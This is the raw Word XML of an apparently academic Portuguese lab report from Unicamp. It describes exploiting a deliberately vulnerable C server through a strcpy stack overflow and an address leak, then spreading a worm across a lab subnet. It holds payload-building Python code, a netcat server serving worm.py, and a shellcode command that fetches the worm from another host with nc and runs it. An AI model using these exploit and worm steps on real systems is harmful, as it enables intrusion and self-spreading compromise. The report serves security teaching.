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114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1006730" cy="86201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730" cy="862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-85723</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>114300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="852488" cy="85248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852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desenvolvimento das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34.185791015625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Instituto de Computação - Universidade Estadual de Campinas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000004">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="105.7470703125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Allan M. de Souza, Rafael O. Jarczewski</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005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Nome: Randerson Araújo de Lemos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RA: 103897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aqiwyf11gtwl" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análise da Pilha de Memória com GDB/GEF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Antes da implementação da técnica de invasão, o binário vulnerável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alvo_vulneravel/server.c</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) foi submetido a uma análise dinâmica utilizando o GDB com o plugin GEF. O objetivo foi confirmar experimentalmente o comportamento da função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strcpy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e sua interação com o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">saved RBP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e o endereço de retorno.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heading=h.ob20wq5148i4" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">O Código Vulnerável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&lt;unistd.h&gt;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bof(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*str)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buffer[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--- (Info Leak) ---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printf(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"[INFO LEAK] O endereco real do buffer eh: %p\n"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*)buffer);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fflush(stdout);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strcpy(buffer,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printf(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"Mensagem copiada!\n"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printf(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"Servidor iniciado. Aguardando entrada...\n"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fflush(stdout);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(read(STDIN_FILENO,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bof(input);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A vulnerabilidade decorre da utilização da função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strcpy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que não valida o tamanho dos dados de entrada. Embora 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possua apenas 50 bytes, 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input</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (recebido via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socket</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) pode chegar a 500 bytes. Isso permite a manipulação arbitrária da pilha, excedendo os limites de alocação.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heading=h.dk8xijn7zr37" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Layout do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:i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e Confirmação Experimental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A análise de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">disassembly</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permitiu mapear o seguinte layout na pilha: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 Relativo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rbp-0x40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buffer[0..49]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50 bytes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rbp-0x0e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  <w:t xml:space="preserve">/Alinhamento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14 bytes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rbp+0x00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Saved RBP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rbp+0x08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Saved Return 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8 bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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strcpy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> escreve sequencialmente, permitindo a sobrescrita do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs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, do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">saved RBP</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> e do endereço de retorno. O cálculo do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">offset</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> para o endereço de retorno foi definido em 72 bytes. Os primeiros 72 bytes do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:i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atuam como um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOP sled</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, enquanto os 8 bytes subsequentes (72 a 79) reescrevem o endereço de retorno.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34787057"/>
        <w:tag w:val="goog_rdk_0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591175" cy="4775200"/>
                      <wp:effectExtent b="0" l="0" r="0" t="0"/>
                      <wp:docPr id="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1175" cy="4775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Figura 1: Estado da memória após a execução de strcpy. A imagem ilustra a sobrescrita completa do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padding</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> e a modificação intencional do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saved RBP</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> e do endereço de retorno. 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payload</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> injetado é visível na pilha, ocupando os 72 bytes do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offset</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> e inserindo o endereço de redirecionamento, o que comprova experimentalmente a viabilidade da técnica de invasão.</w:t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2sq5cynw1gr9" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redirecionamento do Fluxo de Execução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A simples sobrescrita do endereço de retorno é insuficiente sem o apontamento para um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> válido. O redirecionamento para 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de destino da função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strcpy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> é inviável devido à interrupção da cópia pelo byte nulo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\x00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A estratégia adotada utiliza a variável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input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i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">stack frame</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> da função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main</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, preenchida pela chamada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read(STDIN_FILENO, input, 500)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Como esta função realiza a cópia literal sem o tratamento de terminador nulo, o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> permanece íntegro. O fluxo de execução é, portanto, redirecionado para esta área de memória.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xvw89dfqts94" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Implementação do Cálculo de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Offset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getFile()</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> constrói o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:i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conforme a lógica abaixo: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getFile(bufaddr,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shellcode):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INPUT_OFFSET_FROM_BUFFER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0x50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SHELL_START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bytearray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0x90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content[SHELL_START:SHELL_START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(shellcode)]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shellcode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input_addr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bufaddr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INPUT_OFFSET_FROM_BUFFER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input_addr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content[OFFSET:OFFSET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ret.to_bytes(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byteorder=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"little"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Parâmetros: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OFFSET = 72:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Distância entre o início do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e o endereço de retorno.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INPUT_OFFSET_FROM_BUFFER = 0x50:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deslocamento entre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SHELL_START = 100:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Início do </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shellcode</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, precedido por um </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOP sled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bufaddr:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Endereço real do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obtido via vazamento de informação (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Info Leak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Realização do Ataque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O ataque foi estruturado em duas etapas fundamentais. Primeiramente, estabeleceu-se um servidor de arquivos para disponibilizar o script worm.py. O servidor foi configurado para escutar conexões na porta 8080 e enviar o código do worm automaticamente mediante requisição, operando através do seguinte comando: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-lnvp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8080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worm.py;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Em seguida, o script de ataque principal foi executado, sorteando alvos na rede (faixa 172.28.[1-5].[10-14]) para a propagação automática.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getNextTarget():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terceiro_octeto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randint(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quarto_octeto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randint(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ip_sorteado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f"172.28.{terceiro_octeto}.{quarto_octeto}"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ip_sorteado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A técnica de invasão consiste nas seguintes ações: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1. Identificação do endereço da variável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input</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> via vazamento de memória (Info Leak).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2. Construção do payload com o endereço de redirecionamento calculado dinamicamente.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 Sobrescrita do endereço de retorno para desviar o fluxo de execução para o shellcode.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O shellcode executa a criação do arquivo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infectado.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, recupera o worm via backdoor e reinicia o ciclo de propagação.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"(echo 'true' &gt; infectado.txt ; nc -w3 172.28.1.100 8080 &lt; /dev/null &gt; worm.py ; python3 worm.py &gt; out.txt) &lt; /dev/null &gt; /dev/null 2&gt;&amp;1 &amp;"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shellcode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create_hex_command(payload.encode())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A seguir, apresentamos três imagens que documentam a evolução do ataque, exibindo o estado dos sistemas vítimas em diferentes estágios:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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76826450"/>
        <w:tag w:val="goog_rdk_1"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Table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</w:rPr>
                  <w:drawing>
                    <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                      <wp:extent cx="5591175" cy="3073400"/>
                      <wp:effectExtent b="0" l="0" r="0" t="0"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1175" cy="307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Figura 1:</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> Estado inicial dos sistemas antes da execução da técnica de invasão.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2760855"/>
        <w:tag w:val="goog_rdk_2"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Table4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</w:rPr>
                  <w:drawing>
                    <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                      <wp:extent cx="5591175" cy="3073400"/>
                      <wp:effectExtent b="0" l="0" r="0" t="0"/>
                      <wp:docPr id="5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1175" cy="307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Figura 2:</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> Estágio intermediário da propagação, com conexões em andamento.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50588836"/>
        <w:tag w:val="goog_rdk_3"/>
      </w:sdtPr>
      <w:sdtContent>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Table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</w:rPr>
                  <w:drawing>
                    <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
                      <wp:extent cx="5591175" cy="3073400"/>
                      <wp:effectExtent b="0" l="0" r="0" t="0"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1175" cy="307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Figura 3:</w:t>
                </w:r>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:rtl w:val="0"/>
                  </w:rPr>
                  <w:t xml:space="preserve"> Estado final, confirmando a infecção de todos os alvos na rede.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Adicionalmente, o arquivo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attack.mp4</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> demonstra o processo completo de execução e propagação da técnica de invasão.</w:t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TRyd4yiSwwWsY0BWJ7cjf9hNSQ==">CgMxLjAaHwoBMBIaChgICVIUChJ0YWJsZS5vMDBhbDY3NDdmZWEaHwoBMRIaChgICVIUChJ0YWJsZS4zNmVpb2NnZjNsM3caHwoBMhIaChgICVIUChJ0YWJsZS5jdTR1dGtkZjY5MGoaHwoBMxIaChgICVIUChJ0YWJsZS54N2plczFkMjM2eGQyDmguYXFpd3lmMTFndHdsMg5oLm9iMjB3cTUxNDhpNDIOaC5kazh4aWpuN3pyMzcyDmguMnNxNWN5bncxZ3I5Mg5oLnh2dzg5ZGZxdHM5NDgAciExWlBOb0JKS0NOem9BWDd6cENsMlQ0bGo3M05ncHkyV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